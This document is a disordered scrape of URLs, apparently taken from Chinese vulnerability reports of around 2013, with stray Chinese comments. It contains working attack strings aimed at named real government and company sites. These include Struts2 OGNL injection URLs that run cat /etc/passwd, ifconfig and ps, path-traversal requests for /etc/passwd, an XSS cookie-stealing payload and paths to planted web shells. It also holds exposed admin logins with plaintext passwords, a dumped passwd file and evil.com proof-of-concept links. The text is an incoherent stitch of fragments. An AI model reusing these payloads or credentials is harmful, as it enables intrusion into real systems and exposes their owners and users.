http://218.242.57.205:8080/xampp/cds-fpdf.php http://my.csdn.net/my/favorite),点击添加 http://my.csdn.net/u011311506),可以看到,作为个人动态,属性原封不动地写了出来 http://wooyun.org http://website.tkamc.taikang.com/tkweb/accodoupload.do url:http://117.79.151.11/admin/index.php?mod=dns user:admin pass:12345678 http://dns3.baofeng.net http://db.tgbus.com/dota2/s?w=1 http://db.tgbus.com/wow/items.html?q=%E7%B2%97%E7%B3%99&c=88952634&s=88952634 http://db.tgbus.com/wow/achievements.aspx?prename=1% http://drops.wooyun.org/tips/143 http://www.zjly.gov.cn/index.do http://www.51diancai.com/userHelp_contactUs.action http://www.sxinfo.gov.cn/book/zxdc/Com_add.do http://user.sanwen8.cn/manage/showdraft?aid=111275 http://user.sanwen8.cn/manage/showdraft?aid=111275 http://user.sanwen8.cn/manage/showdraft?aid=111275 http://wenda.qumaiya.com/ask/reply/wenid/330 http://rank.7k7k.com/article.php?id=23 http://jiumei.com/user/user_showlogin.shtml http://www.22.cn/ https://112.11.126.22:443/ http://www.cfc108.com/zxjt/gotoYYT.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.cfc108.com/zxjt/gotoYYT.action?redirect:$ http://pic.gmw.cn/ucenter/cameraman!home.do root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin virtual:x:500:500::/home/vsftp:/bin/bash nagios:x:501:501::/home/nagios:/bin/bash http://price.online.sh.cn/product/quitmarket.do http://www.tudou.com/my/setting/notifyMe.action里的一个【以上消息可用下面方法提醒我】form http://message.tudou.com/updateEmailSetting.html?callback=jQuery16405471757907992225_1375018012075&isSend=1&frequency=14&email=XXX%40email.com&_=1375018012464 http://www.tudou.com/my/setting/notifyMe.action http://richardwiseman.wordpress.com/2013/07/22/answer-to-the-friday-puzzle-215/ http://www.squarefree.com/2012/04/16/car-free-apps/ http://zone.wooyun.org/content/5275 http://ah2.zhangyue.com/zybook/u/p/user.php?action=qiandao&Act=turn_card&key=2QM&usr=156XXX01&rgt=5&p1=1307271227XXXX74&p2=108X5&p3=63X0&p4=501603&p5=12&p6=IJIGXXXFIHD&p7=DFIFHEXXXEEC&p9=1&p15=XT615&p16=XT615&p19=ireader_2.3.1&pk= http://ah2.zhangyue.com/zybook/u/p/user.php?price=5100&key=2QM&action=qiandao&Act=registration&usr=156XXX01&rgt=5&p1=1307271227XXXX74&p2=108X5&p3=63X0&p4=501603&p5=12&p6=IJIGXXXFIHD&p7=DFIFHEXXXEEC&p9=1&p15=XT615&p16=XT615&p19=ireader_2.3.1&pk=2Q2 ext:uc_dw:http://www.evil.com/evil.html http://的页面中直接调用file://,但还是可以从http://跨到file://。POC如下 ext:wo:file:///evil.html ext:uc_dw:http://fuzzing.duapp.com/evil.html"/ http://kfmail.sdo.com/MailManage/MailSearch.aspx http://photo.189.cn/default.aspx http://www.dhl.com.cn/page.php?AboutId=26 http://common.51web.com/login.jsp http://common.51web.com/ http://beian.51web.com/ERS/apiAction!getAuthentication.action?timeStamp=20130729105302271&checkSum=7e040d8919ce209d7b84f07e4682c99e&useName=frank_passion&password=frankliu0203 http://pk.tom.com/web/v2flash/index_game.html http://mmbox.myuni.com.cn/ http://kingdeeone.app.mykingdee.com/account/sign-up.action http://hi.haidilao.com/logins/login.action http://www.hnlysl.gov.cn/sousuo/index.php http://i.house.sina.com.cn/index.php?ctrl=sendsms&act=sendsms&bkway=4&jsoncallback=jsonp1375062960656&t=1375063197011&smscontent=[自定义]400-606-6969%E8%BD%AC71706&return_url=http http://www.atbora.com/?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D link:http://lit2.tnt.com.cn/tracker/trackandtraceInit.do http://211.138.108.116/pagesindex.action http://sswz.spb.gov.cn/login/login!link.action http://xm.zjkjt.gov.cn/redirect.action http://tjqy.scofcom.gov.cn/Investment/info/indexEntp.action http://www.xmyg.gov.cn/index.action http://kj.xjcz.gov.cn/web/resultInitWebSign.action http://www.bjcc.gov.cn/webpoll/vote.action http://www.xmjj.gov.cn/xxfw/showjdczhxxMain.action http://www.wh-price.gov.cn/cms/frontpage/price_monitor/PriceTypeList.action http://qcxx.mof.gov.cn/public.action http://vod.shqp.gov.cn/viewer/viewerLook!playMedia.action http://www.bzldbz.gov.cn/index.action http://xkpt.mot.gov.cn/default/bszn/loadBszn.action http://www.bjsupervision.gov.cn/caphtjcj/webComplaint/complaint.action http://www.ccjgdj.gov.cn/Vuser.action http://mail.haciq.gov.cn/User_Login_problem.action http://www.hnds.gov.cn/taxlawAppDownload.action http://www.hebwater.gov.cn/info/infoFrontAction.goInfoContent.action http://www.gxrft.gov.cn/listArticle.action http://changs.ccgp-hunan.gov.cn/newsAction!showFileUrlById.action http://eservice.sipac.gov.cn/loadNewsContent.action http://share.escience.gov.cn/index/pageIndex_contact.action http://www.rzdj.gov.cn/index-pic.action http://digital.zjgws.gov.cn/ZJGHEALTH/register_findDoctor.action http://www3.bjxch.gov.cn/login.action http://wlkt.yn.gov.cn/onlinelearn/topic_main.action http://www.jlta.gov.cn:8033/QuestionnaireSystem/Questionnaire_indexQuestionnaire.action http://www.lntl.hrss.gov.cn/page/qtnews/zcfgneirong.action http://www.csmap.gov.cn/iportal/iportalIndex.action http://www.jiangyin.gov.cn/jymh/resource/plugins/interview/interviewOnline!getAllInterview.action http://www.sdjs.gov.cn/zxzx/survey/user-view-survey-list.action http://www.hbgbzx.gov.cn/portal/info!info.action http://www.hicrj.gov.cn/ELSNetAccept/chose/showConsider_chose.action http://nycyhj.huaihua.gov.cn:8080/info/info/type.action http://www.szwzgs.gov.cn/JeecmsF/ww/nei2.action http://www.jszwgov.cn/spdt/spdt_listSp.action http://www.anhuimj.gov.cn/master/webchannel!detail.action http://jh.hljkj.cn/Yhgl_login.action http://i.baofeng.com/verify_email.html user.baofeng.com/user/?a=sendCheckMail&email=827731626%40qq.com&callback=Security.setEmailResult http://i.baofeng.com/forget_password.html http://www.caaet.cn/list!searchlist.action http://user.baofeng.com/user/?a=setQuestion&question1=%E6%9A%B4%E9%A3%8E%E5%BD%B1%E9%9F%B3&answer1=%E6%9A%B4%E9%A3%8E%E5%BD%B1%E9%9F%B3&callback=Security.setQuestionResult http://auth.baihe.com/id5/sendAuthId5.action?authedFrom=0需要登录 http://t.cn/zQJBedo http://check.inc.hc360.com/Factory/GetCAMData.aspx?refere=inc.hc360.com&factoryname=%u946b%u6cf0&phone=&fax=&mobile= http://check.inc.hc360.com/Factory/GetCAMData.aspx http://www.kingogo.cn/admin/index.php http://www.kingogo.cn/selschool.php?cate_id=123 http://iphone.wap.soufun.com/news/news.php?pageeach=6&typeid=32 http://fm-ask.kunlun.com http://crj.fjgat.gov.cn:9080/ELSNetAccept/chose/queryProgress_chose.action http://www.fzga.gov.cn:9080/ELSNetAccept/chose/showitem_event.action http://szs.siat.ac.cn/content/listContent.action http://szkh.gtja.com/Download_info.aspx?m=20130116133452530067&n=20130220153332413642 http://www.chuangxin.com/.svn/entries svn://118.***.***.205/wangchunpeng/website/www svn://118.***.***.205/wangchunpeng svn:special svn:externals svn:needs-lock http://www.chuangxin.com/chuangxin/.svn/text-base/wp-config.php.svn-base http://localhost/shopex4.85/api.php?act=search_dly_type&api_version=1.0 http://www.house0515.com/common/lib/FCKeditor/editor/filemanager/upload/php/upload.php http://info.rails.cn/news_detail.asp?id=20120112 http://info.rails.cn/party/news_detail.asp?id=2009022601 http://221.13.32.101/login.aspx http://221.13.32.101/WorkManage/SMSManage.aspx此页面未进行身份认证,单单修改口令还是不够的。 http://kjdb.gdaas.cn/admin/ http://www.7daysinn.cn/product_intro.html http://www.7daysinn.cn/cooperate.html http://in.7daysinn.cn/fckeditor/editor/filemanager/connectors/test.html# http://partner.7daysinn.cn/FCKeditor/editor/filemanager/connectors/test.html# www.zgsj.com http://huochepiao.114piaowu.com/index.action http://tuan.aili.com/feed.php?ename=quanguo http://tuan.27.cn/feed.php?ename=quanguo http://info.zgsj.com/admin/index.asp http://crm.114.com.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://crm.114.com.cn/.svn/entries http://vq.youku.com/resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp http://vq.youku.com/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml http://www.shenzhoupiaowu.com/index.do http://newsletter.csdn.net/show_book?id=130&type=0 http://my.csdn.net/my/album/upload中上传一张图片,抓包,把filename的后缀改为.php,但是失败了; http://my.csdn.net/my/album)进入相册,突然发现图片的标题和去掉扩展名的filename一模一样。 mikuxss.sinaapp.com/12CmMi http://www.zgsj.com/reg/forget.asp http://hudong.mywtv.cn/uc/data/avatar/000/02/52/39_avatar_small.jpg/1.php http://service.mtime.com/Service/Twitter.msi?Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.TwitterService&Ajax_CallBackMethod=Follow&Ajax_CrossDomain=1&Ajax_RequestUrl=http%3A%2F%2Fmy.mtime.com%2Fapp%2Ft%2Fsearch%2Fuser%2F%3Fcontent%3D%25E4%25B8%258D%25E5%25BC%25BA%26searchtype%3D0%26usertype%3D0%26locationtype%3D0%26locationid%3D0%26sex%3D-1%26minage%3D0%26maxage%3D0&t=201372913162997346&Ajax_CallBackArgument0=5875540 http://service.mtime.com/Service/Twitter.msi?Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.TwitterService&Ajax_CallBackMethod=UnFollow&Ajax_CrossDomain=1&Ajax_RequestUrl=http%3A%2F%2Fmy.mtime.com%2Fapp%2Ft%2Fsearch%2Fuser%2F%3Fcontent%3D%25E4%25B8%258D%25E5%25BC%25BA%26searchtype%3D0%26usertype%3D0%26locationtype%3D0%26locationid%3D0%26sex%3D-1%26minage%3D0%26maxage%3D0&t=201372913185796643&Ajax_CallBackArgument0=5875540 http://service.mtime.com/Service/Message.msi?Ajax_CallBack=true&Ajax_CallBackType=Mtime.Service.Pages.MessageService&Ajax_CallBackMethod=SendUserMessageToNicknameCrossDomainByFlash&Ajax_CrossDomain=1&Ajax_RequestUrl=http%3A%2F%2Fmy.mtime.com%2Fapp%2Ft%2Ffollower%2F&t=201372915233312498&Ajax_CallBackArgument0=%E4%B8%8D%E5%BC%BA&Ajax_CallBackArgument1=111111111122222222222222 http://www.nanxian.gov.cn/zfxxgk/Admin_Login.asp http://www.jdxf.gov.cn/readnews.php?newsid=6285 http://www.jdxf.gov.cn/readnews.php?newsid=6285 http://hc.csdn.net/contents/content_details?type=activities http://newsletter.csdn.net/show_book?id=130 http://exam.xhd.cn/index/feedBack!save.do?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://www.suqian.gov.cn/sqapp/nrglIndex.action http://event.hd.baofeng.com/.idea/workspace.xml http://event.hd.baofeng.com/three/public/images/pic/toupiao/t6_1.jpg/1.php http://wooyun.org/bugs/wooyun-2013-027138 http://jinglao.net/phpmyadmin http://press.gapp.gov.cn:8088/press_search/pages/query/queryAction!findVerifyPaging.action http://info.rails.cn/dlopac/ExpiredList.aspx http://info.rails.cn/dl/MagazineNavigation.aspx?KayID=1 http://fk.lcxw.cn http://fk.lcxw.cn/plus/mytag_js.php?aid=9090 http://mnk.lcxw.cn http://mnk.lcxw.cn/plus/mytag_js.php?aid=9090 http://jbcx.lcxw.cn http://jbcx.lcxw.cn/plus/mytag_js.php?aid=9090 http://ebh.lcxw.cn http://lcxw.cn/ http://218.5.70.231/manage/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F http://218.5.70.231/1.asp http://www.tzsl.gov.cn/water_mesage/ http://www.tzsl.gov.cn/Manage.aspx http://analytics.tomonline-inc.com/EDM_OLD/login.html http://analytics.tomonline-inc.com/libs/editor/ http://analytics.tomonline-inc.com/phpmyadmin/setup/index.php http://analytics.tomonline-inc.com/phpmyadmin http://analytics.tomonline-inc.com/phpinfo.php http://219.234.174.162/admin/login.aspx) http://219.234.174.162/aaa.asp http://shop.skype.tom.com/fg/userspace/productQuestionList.do?actionType=ajaxquestlist&productId=bvc0235&isPage=true http://www.wugang.gov.cn/jact/front/front_mailpubdetail.action?transactId=6747&sysid=2 http://xcb.sh.gov.cn/SSOServer/SSO/Validate_findPwdPage1.action http://www.zjjgbz.gov.cn/zjjgbz/index.do http://www.gig.gdas.ac.cn/list.asp?id=24 http://home.rails.cn/a.zip http://www.rails.cn/a.zip http://fc.wlmq.com/ http://www.lamiu.com/search.php?user_email_special=请输入Email获取最新信息&user_email=请输入Email获取最新信息&keywords=WCRTESTINPUT000000 http://tianya.lamiu.com/log.txt http://www.lamiu.com/log.txt notify_url_log:sign=f15edfc359571a20df57b972a1cff49c&mysign=f15edfc359571a20df57b972a1cff49c&0.00,1,订单号:20110708049417,2011070876888784,fsgreathill@163.com,2011-07-08 http://www.lamiu.com/readme.txt http://jtcl.js.chinamobile.com/pub/queryRings.do http://www.jhxcb.gov.cn/admin123/login.php http://www.jhxcb.gov.cn/uploads/1.asp my.weke.com/registerAction.action http://hksifaju.huanghekou.gov.cn/dede/login.php http://m.7k7k.com/ http://login.lvmama.com/nsso/findpass/index.do http://www.hmcz.gov.cn http://61.130.7.247/gpsback/index.action http://minisite.youku.com/ http://minisite.youku.com/admin1/login.php url:http://info.meadin.com/Show_Ajax_People_HotCount.asp?ids=1 http://xxfbgz.he.sgcc.com.cn:8081/index.do http://szjs.net/ZhuJian/NewAction_center.action http://211.139.229.170/sys/loginInput.action http://www.mtcsol.org/mtcsol/showSchoolList.action网址,利用struts2指令redirect即可获取服务器系统用户信息 http://www.mtcsol.org/mtcsol/showSchoolList.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://www.snqi.gov.cn/index.do http://www.sxtzsb.org/index.do http://yul.snqi.gov.cn/index.do http://yangl.snqi.gov.cn/ http://hz.snqi.gov.cn/ http://tc.snqi.gov.cn/ http://sl.snqi.gov.cn/ http://www.youlema.com/mc/login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://szxx.beijing.gov.cn:8080/bjxf_public/toRecheckQueryPortal.action http://www.sdchem.gov.cn/index.do http://mail.catr.cn/user/ http://mail.catr.cn/manage/ http://mail.catr.cn/sql/ http://mail.catr.cn/images/ http://mail.catr.cn/inc/ http://mail.catr.cn/include/ http://smscom.12321.cn:8080/shell.jsp http://www.mrsta.com/ks_data/kesioncms4.mdb http://www.mrsta.com/x.asp http://www.mrsta.com/Plus/cywx.asp http://zhibo.miit.gov.cn:8080/direct/displayLogin.do http://zhibo.miit.gov.cn:8080/direct/savepicture.do?menuid=45 http://sso.hc360.com/VerifyLoginName.html http://115.228.224.191/doc/page/login.asp http://wapchat.tom.com/wap.zip http://wapchat.tom.com/aaa.txt http://wapchat.tom.com/secret/stockt/stock.sql http://www.suning.com.cn/ListText.aspx?RID=19&BID=21 http://sso.hc360.com/VerifyLoginName.html http://sso.hc360.com/security/VerifyIdentity.html?operate=2 http://www.cnrcs.org.cn/ekecms/index.do http://shop71502621.taobao.com http://item.taobao.com/item.htm?id=19398782995 http://baidu798.duapp.com转换成淘客链接 http://www.gouwuke.com/tuangou/index.do?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28%22ifconfig%22%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://www.gsjtzb.com/index.do id.uc.cn/xxxxxx http://www.tskj.com.cn/ http://60.2.205.250:83/tskjjh/index/index!index.do http://www.phagd.org/index.do http://www.scwater.gov.cn/index.do http://www.zbboftec.gov.cn:7080/jmj/index.do www.sheitc.gov.cn/index.do http://www.sx12396.com/index.do http://www.sx12396.com/ma.jsp http://www.spgbid.com/spgbid/homeAction/searchAction.action?search=search&msg= http://onlineexam.teacher.com.cn/logout.action http://elearning.teacher.com.cn/cms/detail/index.action http://elearning.teacher.com.cn/admin/register/index.action http://elearning.teacher.com.cn/cms/detail/articleDetail.action http://ver.teacher.com.cn/teacher/front/content.action http://cks.mof.gov.cn/ http://cks.mof.gov.cn/crifs/content/docmanage/download.jsp?filePath=../../../../../../etc/passwd http://www.hnea.gov.cn/ http://www.hnea.gov.cn/manage/content/docmanage/download.jsp?filePath=/tzgg/200901/../../../../../../etc/passwd http://www.beidaihe.gov.cn/newbdh/index.do http://www.gdwater.gov.cn:8080/xzxkpub/open/index.do http://www.shcaee.com/ http://61.138.203.166/downMoneytemplate.action http://mp.ctvap.cn/login!login.html http://www.paulownia.ac.cn/showNews!show.action http://218.7.6.54:8083/traffic/webwork/forestdt/loginmain!zhongbiaomany.action http://kjcg.scst.gov.cn:83/getPortalInfo.action?porId=41 http://wap.cnmo.com/list.php?classid=34&sortid=35 http://wap.cnmo.com/list.php?classid=100&sortid=5&platform=5 http://m.xgo.com.cn/index.php?c=Dealer&kind=1 http://admin.xgo.com.cn/api/vote.php?voteid=15 http://shop.skype.tom.com/ http://www.carsing.com.cn/sitemap.html http://zjhlwjc.zjfda.gov.cn/showMessage.action?id=126 http://www.hnea.gov.cn/ http://www.hnea.gov.cn/manage/content/docmanage/download.jsp?filePath=/tzgg/200901/../../../../../../etc/passwd http://121.28.76.6/kpxm/users/userReg.action http://111.1.56.26/admin/loginAction.action http://www.gdaas.cn/indexHome.action http://58.42.233.33:9080/clglWeb/login/login!main.action http://222.223.188.6:81/hegsnj/login.action http://spcs.nfqs.com.cn/login/getpassword.asp http://www.sdwsxy.cn/wsxy/app/Website_goPaper.action?dataSet.id=2c90cbc8 http://sme.sipac.gov.cn/fckeditor/editor/filemanager/connectors/test.html http://59.53.213.186:8666/webgps/login.action http://weishi.baidu.com/feedback/question_7079.html http://weishi.baidu.com/feedback/add http://www.scdzdj.org.cn/news!viewNews.action?id=223 http://www.scgtxxzx.org.cn/为四川国土资源厅网站 http://bbs.youxi.56.com http://miyou.beauty.rayli.com.cn http://miyou.beauty.rayli.com.cn/?s=23 http://adsite3.rayli.com.cn/ http://adsite3.rayli.com.cn/urara/home_shiguang.php?pid=20121112 http://star.rayli.com.cn http://star.rayli.com.cn/services/service.php?m=user&a=shareSelf&width=190&home_uid=4808966 www.handuyishe.com http://www.wooyun.org/bug.php?action=view&id=43 http://www.joinbright.com/inc/ http://www.joinbright.com/inc/Function.asp,爆出如下错误: http://www.joinbright.com/dat/ http://www.jlswtzb.org.cn/jltyzx.action http://www.typhoon.gov.cn/index.php?controller=cms&action=view&pid=133&cid=4230 http://www.typhoon.gov.cn/index.php?controller=users&action=login http://219.143.15.154/webFindNewEducationInfoD.action?eid=4000 http://wap.agrisx.gov.cn/Web/Content/contentPage.action?contentId=12115984 http://www.scfs.gov.cn/article/loadArticleHtml.action http://www.sdaic.gov.cn/sdgsqt/titleQuery.action http://dcp.ha.stats.gov.cn/survey/showSurvey.action www.wnd.gov.cn/zfw/sitePages/channelPages/page.action www.lpspsc.gov.cn/indexAction.action?page_css=2 www.wlcbzwfwzx.cn/index/index!list.action http://paipai.speedpay.cn:25024/loginAction_login.do?userType=3查询页面loginAction_login.do测试有戏没有,呵呵呵 http://www.speedpay.cn/dologin.jhtml http://www.jxf.gov.cn/czz!Show.action http://222.240.128.174/front/companyManagerAction%21queryCompanyCondition.action http://en.china-sss.com/fore/exceptionLoginPage.action?redirect:$%7B%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]%7B%27ps%27,%27-ef%27%7D%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29%7D http://www.huijiuwang.com/ http://www.huijiuwang.com/blog/ http://phpweb.oray.com/page/products/?9.html http://whnari.sgepri.sgcc.com.cn/productList.js https://www.dingxindai.com/index.php?plugins&q=imgurl&url=QGltZ3VybEAvY29yZS9jb21tb24uaW5jLnBocA== https://www.dingxindai.com/index.php?plugins&q=imgurl&url=QGltZ3VybEAvLi4vLi4vLi4vZXRjL3Bhc3N3ZA== http://hi.haidilao.com/pages/haidl/find_password.jsp?email=c210cF9hZG1pbkB5ZWFoLm5ldA== http://hi.haidilao.com/pages/haidl/find_password.jsp?email=aHR0cF9hZG1pbkAxNjMuY29t http://www.etongdai.com/index.php?plugins&q=imgurl&url=QGltZ3VybEAvY29yZS9jb21tb24uaW5jLnBocA== http://192.168.1.102/ecshop/upload/user.php?act=profile http://hi.haidilao.com:80/logins/resetPwdByEmail.action?validateinfo=MTM3NTMzMDk4MDAwMHxoZGxAaGFpZGlsYW8uY29t http://hi.haidilao.com/pages/haidl/logins/login.action http://hi.haidilao.com/invitation/queryPost.action http://hi.haidilao.com/mblog/viewfollow.action http://cater.haidilao.com/Cater/toOrderSeatInfo.action site:haidilao.com http://jbjgl.scst.gov.cn/home/show/id/15 http://bbs.zhulong.com/ http://bbs.zhulong.com/forum.php?gid=86 http://218.242.57.205:8087/forum.php这论坛用的端口访问,然后就对218.242.57.205做了个端口扫描 http://218.242.57.202:8012/ http://pcab.nlc.gov.cn/xwdt/viewNews.action?id=29001 http://59.151.100.241:5555/ https://www.baopay.com:7443/jsp/baopayManager/login_redirct.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://pubinfo.whjs.gov.cn:8066/frontpage/pubinfo/PubinfoDetail.action?id=1201305271455210007 http://hi.haidilao.com/pages/haidl/order_iframe.jsp?url=aHR0cDovL2NhdGVyLmhhaWRpbGFvLmNvbTo4MC9DYXRlci9vcmRlck1vZGlmeS90b09yZGVyTW9kaWZ5LmFjdGlvbj9vcmRlcklkPVdCSjAyMjAxMzA4MDEwMTY4OCZ0eXBlPTM=#height=1021 http://www.sxjt.gov.cn/sxjt_www2/ http://124.127.49.76:8099/dotproject/ http://www.tyga.gov.cn:17777/xfxt/xjfl.action?name=content&l.lid=20121111222519 http://cds.haidilao.com/jmx-console/ http://cds.haidilao.com/Shell/shell.jsp https://services.cira.ca/agree/mdf/index.action http://dhs.21vianet.com/dhs/pdtype.php?SITE_ID=56&ID=101&NETWORK_ID=0&PMODE_ID=9999&PR=%D3%D0%B2%FA%C8%A8 http://amb.haidilao.com//user!login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://nyj.jl.gov.cn/AgencyView.php?Id=1 http://hi.haidilao.com/haidl/webmodule/casualBlog.action?content=03FEF79E769FDD189CB08436402A727D62AE5D6443018886&picName=10.png&picSize=45k&picPath=http://hi.haidilao.com:80/upload/2013/8/1/137533877.png%22%20onerror=%22alert%28document.cookie%29%22 http://www.gdcrj.com/gdcrjwsyy/index.do http://hi.haidilao.com/logins/registerJump.action http://127.0.0.1/ecshop/admin/privilege.php?act=add http://hi.haidilao.com http://124.127.49.85:8080/hdlAdmin/account/userLogin.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://124.127.49.85:8080/hdlAdmin/account/userLogin.action?redirect:${%20%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%20%23b%3d%23a.getInputStream%28%29,%20%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%20%23d%3dnew%20java.io.BufferedReader%28%23c%29,%20%23e%3dnew%20char[50000],%23d.read%28%23e%29,%20%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%20%23matt.getWriter%28%29.println%28%23e%29,%20%23matt.getWriter%28%29.flush%28%29,%20%23matt.getWriter%28%29.close%28%29%20 